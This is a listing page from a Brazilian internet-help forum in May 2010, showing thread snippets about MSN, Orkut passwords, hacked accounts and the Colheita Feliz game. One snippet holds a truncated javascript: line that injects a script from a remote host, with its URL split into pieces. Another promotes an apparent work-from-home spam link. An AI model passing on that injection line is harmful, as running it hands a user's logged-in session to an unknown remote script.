Fórum Problemas Internet

Configuração e problemas de rede de área local, Wi-Fi, roteador, modem, chaves USB

Discusões

Msn não abre

Bom dia, Formatei o meu PC, e perdi o Windows live, fui instalar novamente, todos os programas instalaram normal, menos o MSN, que não entra de ...

Última resposta em 28 mai. 2010 por
farofa

Eduarda: como jogar a colheita feliz

Bom dia, como eu faso para jogar colheita feliz

Última resposta em 27 mai. 2010 por
Ana Spadari

Minha caixa de conversa não marca

Bom dia, minha caixa de historico de conversa não está ativando, ele desmarca sozinha, o que será que estou fazendo de errado? Configuração: ...

Última resposta em 25 mai. 2010 por
luciniel

Redefinir senha

Oi, tudo bem? é possivel mudar a senha do meu email? eu queria achar uma senha dificil de ser descoberta. me ajudem vai

Última resposta em 25 mai. 2010 por
ana julia

Descobrir minha senha

 Resolvido

Gente perdi a senha do meu usuario como faço para descbrir Uso o windows Frofessional compilaçao 2600.xpsp.080413-2111(Service pack3)

Última resposta em 25 mai. 2010 por
Ana Spadari

Quero um endereço seguro p/meus emails

Bom dia, Só quero receber meus emails

Última resposta em 25 mai. 2010 por
Ana Spadari

Gabriela:webcam não funciona no msn

Olá eu queria saber porque meu msn nao está lingando. Eu ja instalei mais quando abro a camera para os meus colegas me verem nao conseguem e eu vo...

Última resposta em 25 mai. 2010 por
Ana Spadari

Amiga: criar conta orkut

amigas para sempre como faz um orkut

Última resposta em 23 mai. 2010 por
sigma4

Historico

Boa noite, existo outra forma de ficar registrado o historico de navegação?? qdo o historico é apagado, eu consigo visualizar as pag visitadas de um...

Última resposta em 23 mai. 2010 por
ana

Colheita feliz- cabra

Como vou dar comida pra minha cabra se não tenho moedas verdes? Dessa forma ela nunca vai se alimentar? COMO ASSIM.....CRIA UM ANIMAL NOVO E NÃO COLOC...

Última resposta em 22 mai. 2010 por
nena

Meu msn da erro

Bom dia,o meu msn 2009 eu ja baixei pelo site e pelo baixaki mas da erro no aplication erro repoting ja tentei instalar mais de vinte vezes e toda hor...

Última resposta em 22 mai. 2010 por
giro

Diversos destinatarios de um mail

 Resolvido

Bom dia, Eu goqtaria de enviar um email para um grande número de amigos, do quqis eu conheço o enderêço email. Mas gostaria que cada destinatário n...

Última resposta em 21 mai. 2010 por
flavinha

Não consigo ler meus emails

Bom dia, nao consigo ler meus emails coloco pra entra e da senha ou endereço errado mais nao esta certo o q eu faço

Última resposta em 21 mai. 2010 por
Marcos

Everton: compatibilidade web cam win 7

Boa tarde tenho uma web can goldship mais estou usando o windows seve ela não fuciona como eu faço me ajudem!!!

Última resposta em 21 mai. 2010 por
Ana Spadari

Quero ajuda: internet explores e mozila

Bom dia, quero saber porque eu abro o msn pelo mozila e quado vou entrar na caixa de entrada ela abre pela internet explorer Configuração: Win...

Última resposta em 21 mai. 2010 por
luis

Não consigo entrar no meu msn

Bom dia, Já faz algum dias que não consigo entrar no meu msn. Aparece a seguinte mensagem: App Name: msnmsgr.exe App Ver 14.08889.726 AppStam...

Última resposta em 21 mai. 2010 por
kalu

Orkut hakceado me ajude

Bom dia, oie eu gotaria de recuperar o orkut do meu namorado que foi hakceado!!! me ajudemm por favor... Configuração: Windows XP / Internet E...

Última resposta em 21 mai. 2010 por
ana

Problema com o msn

Bom dia, no meu msn quando eu chamava, ia a web normal, o convite, agora quando eu chamo vai direto na chamada de video, tem como arrumar isso? ...

Última resposta em 21 mai. 2010 por
Pesquisador

Trabalheemcasaoverdadeiro.com.br/1375489

 Resolvido

Bom dia, trabalheemcasaoverdadeiro.com.br/1375489 Configuração: Windows XP / Internet Explorer 6.0

Última resposta em 21 mai. 2010 por
tatiana

Monica

acho que meu orkut foi raqueado como faço para recuperalo?pelo amor de deus envie uma resposta...

Última resposta em 20 mai. 2010 por
monica

Luciana lopes: ajudar config. twitter

peço ajuda para configurar o meu twitter ate agora nao consegui fazer nada

Última resposta em 19 mai. 2010 por
Ana Spadari

Não consigo mais entrar no orkut

Bom dia, Não consigo mais entrar no meu orkut, pq trocaram minha senha como faço para recuperar ele ? Configuração: Windows XP / Firefox 3.6....

Última resposta em 17 mai. 2010 por
toto

Duvidas para como eu posso criar meu msn

Bom dia, eu to tentanto criar um msn quando eu acabo e cliko em aceito da erro. oq eu faço? Configuração: Windows XP / Internet Explorer 8.0

Última resposta em 16 mai. 2010 por
dg

Orkut hackeado

Bom dia, meu orkut foi hackeado, e estao usando de forma errada me ajudem por favor Configuração: Windows 7 / Internet Explorer 8.0

Última resposta em 16 mai. 2010 por
gDJ

Desesperada: como trocar a senha do msn?

sera que alguma pessoa inteligente sabe me dize como eu troco a senha do msn plussssssssssss

Última resposta em 15 mai. 2010 por
carlos

Não consigo instalar o msn erro 5

Bom dia, não consigo instalar o msn beta 9.0 toda vez q eu tento aparece uma mensagem dizendo q e impossivel instalar por causa de um erro 5 o q faço ...

Última resposta em 14 mai. 2010 por
vitiinho

Colheita

Configuração: Windows XP / Firefox 3.6.3 javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//sn%...

Última resposta em 13 mai. 2010 por
ana

Como faço para reativar meus emails

Estava usando o msn e gostaria de reativar meus e-mails do hotmail. Como faço?

Última resposta em 13 mai. 2010 por
zuzu

Senha perdida do msn

Mee ajudam achar minah senha perdii a senha a do msn e do orkut presizor urgente desse negoço vlw aii quem puder ² *---*

Última resposta em 13 mai. 2010 por
fafa

Senha perdida

 Resolvido

Bom dia, eu entrei no msn e gravei a senha ,para depois entrar automatico ,maaaaaaaas eu tirei da opçao de gravar e a senha sumiu,agora nao lembro m...

Última resposta em 13 mai. 2010 por
mauricinho

Perdi minha senha

 Resolvido

Bom dia, perdi minha senha do meu outro email do msn loh.4600sb@hotmail.com alguem me auda esse email e de serviço e preciso muito dele nao sei ...

Última resposta em 13 mai. 2010 por
oi

Jair emilio: recuperar a senha do orkut

olá, boa noite..como q faço p/ recunperar a senha do meu orkut. eu aceeso o email certo e ñ consigo entrar com as senhas q digito... ñ consigo le...

Última resposta em 11 mai. 2010 por
-kellen

Orkut

tenho o endereço e a senha do meu orkut,porem não consigo abri-lo.quando tento diz que o nome e endereço está errado mas tenho certeza que estão corre...

Última resposta em 11 mai. 2010 por
marcio.silva

Orkut

minha prima hackeou meu orkut e o hotmail,como faço pra conseguir de volta os dois

Última resposta em 11 mai. 2010 por
hugo

Esqueci minha senha do orkut wm.paula@bol.

gostaria de ajuda pra recuperar minha sena , não concigo acessar meu orkut da bol Configuração: Windows XP / Internet Explorer 7.0

Última resposta em 9 mai. 2010 por
wm.paula@bol.com.br

Esqueci a minha senha

Configuração: Windows XP / Firefox 3.6.3 como acessar meu orkut passo a passo se esquessi minha senha]? porq esse tal de redefinir minha senha ...

Última resposta em 7 mai. 2010 por
fio

Perdi minha senha

Perdi minha senha e não tenho mais o imail alternativo e ñ lembro a palavra secreta. Gostaria muito de obeter ajuda, pois minha conta continua valend...

Última resposta em 7 mai. 2010 por
Lion

Orkut roubado

Bom dia,entrei num tal de bbb9 e meu orkut nao abriu mais que faço

Última resposta em 6 mai. 2010 por
Anonimo

Descobrir password e-mail

entraram no meu e-mail e mudaram-me a password. já fiz um novo mas preciso dos contactos. dá para me enviarem a password do meu mail? É pafmoreira@hot...

Última resposta em 6 mai. 2010 por
antoniosantos

Comida pra minha cabra

o que eu dô para a minha cabra no colheita feliz?

Última resposta em 5 mai. 2010 por
ana

Nao consigo entrar no meu email

Bom dia, nao consigo acessasr minha email

Última resposta em 5 mai. 2010 por
elaine

Ajuda com a cabra da colheita feliz

comprei osso pra cabra do colheita feliz e na hora q fui alimentar falou q aqla comida não era adequada para a cabra, sei q tem aqla outra comida, só ...

Última resposta em 4 mai. 2010 por
nina

Ajuda: esqueci senha do orkut

Configuração: Windows XP / Internet Explorer 8.0 ola por gentileza nao me lembro da minha senha e nem do login do meu orkut e nao consigo acessar.......

Última resposta em 4 mai. 2010 por
guga

Webcan cvc2302

tenho uma webcan desse modelo cvc2302 e instalei o programa com o cd de instalaçao mas quando conecto a minha webcan no usb da erro dispositivo nao en...

Última resposta em 4 mai. 2010 por
guga

Como recupera orkut

Como Recupera Meu Orkut? Esqueci A Senha

Última resposta em 4 mai. 2010 por
guga

Como saber se o meu contacto me bulquiou

como saber se o meu contacto recebe as minhas mensaguens instantanias estando sempre ofllai ne Configuração: Windows XP / Safari 532.5

Última resposta em 4 mai. 2010 por
ana

Conta desativada

Bom dia, meu nome é patricia anchieta, ha 2 dias atraz tento entrar em minha conta do facebook, mas sempre diz que esta desativada, eu gostaria de sa...

Última resposta em 4 mai. 2010 por
escalada

Preciso de ajuda impos de acessar msn...

Oi será que alguém poderia me ajudar ?? meu MSN não quer mais conectar no meu pc , quando acesso ele só aparece o contorno da janela do Msn daí apar...

Última resposta em 4 mai. 2010 por
gaby

Esqueci a minha senha ='(

Configuração: Windows XP / Internet Explorer 7.0 esqueci minha senha , fui trocar e esqueci . porfavor me ajuda e urgenti ='( Obrigado:jenyffer

Última resposta em 3 mai. 2010 por
dayane

Orkut, não consigi acessa-lo

Nao consigo acessar o orkut pois a internet diz q a pagina esta anulada....o Q faço p conseguir acessar a pagina?

Última resposta em 3 mai. 2010 por
josé geová viana
Resultados 9301 - 9350 de 9.790

Assine nossa newsletter!

Assine nossa newsletter!
Junte-se à comunidade